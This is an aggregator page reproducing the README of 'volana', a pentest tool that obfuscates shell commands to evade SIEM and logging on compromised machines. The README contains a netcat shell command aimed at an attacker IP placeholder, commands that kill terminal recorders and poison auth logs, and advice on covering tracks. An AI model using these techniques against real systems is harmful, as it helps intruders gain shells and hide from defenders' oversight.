GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → ariary → volana

ariary / volana

Licence: Unlicense license
🌒 Shell command obfuscation to avoid detection systems

Programming Languages

go
31211 projects - #10 most used programming language
Makefile
30231 projects

Labels

securityobfuscatorinfosecpentestexploitationpentest-toolredteamshell-obfuscate

Projects that are alternatives of or similar to volana

1earn
ffffffff0x 团队维护的安全知识框架,内容包括不仅限于 web安全、工控安全、取证、应急、蓝队设施部署、后渗透、Linux安全、各类靶机writup
Stars: ✭ 3,715 (+9676.32%)
Mutual labels:  infosec, pentest, pentest-tool, redteam
Cloudbrute
Awesome cloud enumerator
Stars: ✭ 268 (+605.26%)
Mutual labels:  infosec, pentest-tool, redteam
NIST-to-Tech
An open-source listing of cybersecurity technology mapped to the NIST Cybersecurity Framework (CSF)
Stars: ✭ 61 (+60.53%)
Mutual labels:  infosec, pentest, redteam
Chashell
Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks.
Stars: ✭ 742 (+1852.63%)
Mutual labels:  infosec, pentest, redteam
haiti
🔑 Hash type identifier (CLI & lib)
Stars: ✭ 287 (+655.26%)
Mutual labels:  infosec, pentest, pentest-tool
moonwalk
Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps. 👻🐚
Stars: ✭ 544 (+1331.58%)
Mutual labels:  infosec, exploitation, redteam
Hershell
Hershell is a simple TCP reverse shell written in Go.
Stars: ✭ 442 (+1063.16%)
Mutual labels:  infosec, pentest, redteam
Winpwn
Automation for internal Windows Penetrationtest / AD-Security
Stars: ✭ 1,303 (+3328.95%)
Mutual labels:  exploitation, pentest-tool, redteam
Snoop
Snoop — инструмент разведки на основе открытых данных (OSINT world)
Stars: ✭ 886 (+2231.58%)
Mutual labels:  infosec, pentest, redteam
Jiraffe
One stop place for exploiting Jira instances in your proximity
Stars: ✭ 157 (+313.16%)
Mutual labels:  infosec, exploitation, redteam
Cloakify
CloakifyFactory - Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into list of everyday strings, using Text-Based Steganography; Evade DLP/MLS Devices, Defeat Data Whitelisting Controls, Social Engineering of Analysts, Evade AV Detection
Stars: ✭ 1,136 (+2889.47%)
Mutual labels:  infosec, pentest, pentest-tool
1earn
个人维护的安全知识框架,内容包括不仅限于 web安全、工控安全、取证、应急、蓝队设施部署、后渗透、Linux安全、各类靶机writup
Stars: ✭ 776 (+1942.11%)
Mutual labels:  pentest, pentest-tool, redteam
Overlord
Overlord - Red Teaming Infrastructure Automation
Stars: ✭ 258 (+578.95%)
Mutual labels:  pentest, pentest-tool, redteam
PyParser-CVE
Multi source CVE/exploit parser.
Stars: ✭ 25 (-34.21%)
Mutual labels:  infosec, pentest, pentest-tool
crawleet
Web Recon & Exploitation Tool.
Stars: ✭ 48 (+26.32%)
Mutual labels:  pentest, exploitation, pentest-tool
Getaltname
Extract subdomains from SSL certificates in HTTPS sites.
Stars: ✭ 320 (+742.11%)
Mutual labels:  infosec, pentest, pentest-tool
Dumpsterfire
"Security Incidents In A Box!" A modular, menu-driven, cross-platform tool for building customized, time-delayed, distributed security events. Easily create custom event chains for Blue- & Red Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations. Build event sequences ("narratives") to simulate realistic scenarios and generate corresponding network and filesystem artifacts.
Stars: ✭ 775 (+1939.47%)
Mutual labels:  infosec, pentest, pentest-tool
Wsmanager
Webshell Manager
Stars: ✭ 99 (+160.53%)
Mutual labels:  infosec, pentest, redteam
Docker Security Images
🔐 Docker Container for Penetration Testing & Security
Stars: ✭ 172 (+352.63%)
Mutual labels:  infosec, pentest, pentest-tool
github-watchman
Monitoring GitHub for sensitive data shared publicly
Stars: ✭ 60 (+57.89%)
Mutual labels:  infosec, redteam
View All Similar Projects ➔

volana (moon in malagasy)

{ Use it ; 🌚(hide from); 🌞(detected by) }

Shell command obfuscation to avoid SIEM/detection system

During pentest, an important aspect is to be stealth. For this reason you should clear your tracks after your passage. Nevertheless, many infrastructures log command and send them to a SIEM in a real time making the afterwards cleaning part alone useless.

volana provide a simple way to hide commands executed on compromised machine by providing it self shell runtime (enter your command, volana executes for you). Like this you clear your tracks DURING your passage

Usage

You need to get an interactive shell. (Find a way to spawn it, you are a hacker, it's your job ! otherwise). Then download it on target machine and launch it. that's it, now you can type the command you want to be stealthy executed

## Download it from github release
## If you do not have internet access from compromised machine, find another way
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana

## Execute it
./volana

## You are now under the radar
volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1  #you are allowed to be a bit cocky
volana » [command]

Keyword for volana console:

  • ring: enable ring mode ie each command is launched with plenty others to cover tracks (from solution that monitor system call)
  • exit: exit volana console

from non interactive shell

Imagine you have a non interactive shell (webshell or blind rce), you could use encrypt and decrypt subcommand. Previously, you need to build volana with embedded encryption key.

On attacker machine

## Build volana with encryption key
make build.volana-with-encryption

## Transfer it on TARGET (the unique detectable command)
## [...]

## Encrypt the command you want to stealthy execute
## (Here a nc bindshell to obtain a interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND

Copy encrypted command and executed it with your rce on target machine

./volana decr [encrypted_command]
## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)

Why not just hide command with echo [command] | base64 ? And decode on target with echo [encoded_command] | base64 -d | bash

Because we want to be protected against systems that trigger alert for base64 use or that seek base64 text in command. Also we want to make investigation difficult and base64 isn't a real brake.

Detection

Keep in mind that volana is not a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder.

By detected we mean if we are able to trigger an alert if a certain command has been executed.

Hide from

Only the volana launching command line will be catched. 🧠 However, by adding a space before executing it, the default bash behavior is to not save it

  • Detection systems that are based on history command output
  • Detection systems that are based on history files
    • .bash_history, ".zsh_history" etc ..
  • Detection systems that are based on bash debug traps
  • Detection systems that are based on sudo built-in logging system
  • Detection systems tracing all processes syscall system-wide (eg opensnoop)
  • Terminal (tty) recorder (script, screen -L, sexonthebash, ovh-ttyrec, etc..)
    • Easy to detect & avoid: pkill -9 script
    • Not a common case
    • screen is a bit more difficult to avoid, however it does not register input (secret input: stty -echo => avoid)
    • Command detection Could be avoid with volana with encryption

Visible for

  • Detection systems that have alert for unknown command (volana one)
  • Detection systems that are based on keylogger
    • Easy to avoid: copy/past commands
    • Not a common case
  • Detection systems that are based on syslog files (e.g. /var/log/auth.log)
    • Only for sudo or su commands
    • syslog file could be modified and thus be poisoned as you wish (e.g for /var/log/auth.log:logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
  • Detection systems that are based on syscall (eg auditd,LKML/eBPF)
    • Difficult to analyze, could be make unreadable by making several diversion syscalls
  • Custom LD_PRELOAD injection to make log
    • Not a common case at all

Bug bounty

Sorry for the clickbait title, but no money will be provided for contibutors. 🐛

Let me know if you have found:

  • a way to detect volana
  • a way to spy console that don't detect volana commands
  • a way to avoid a detection system

Report here

Credit

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].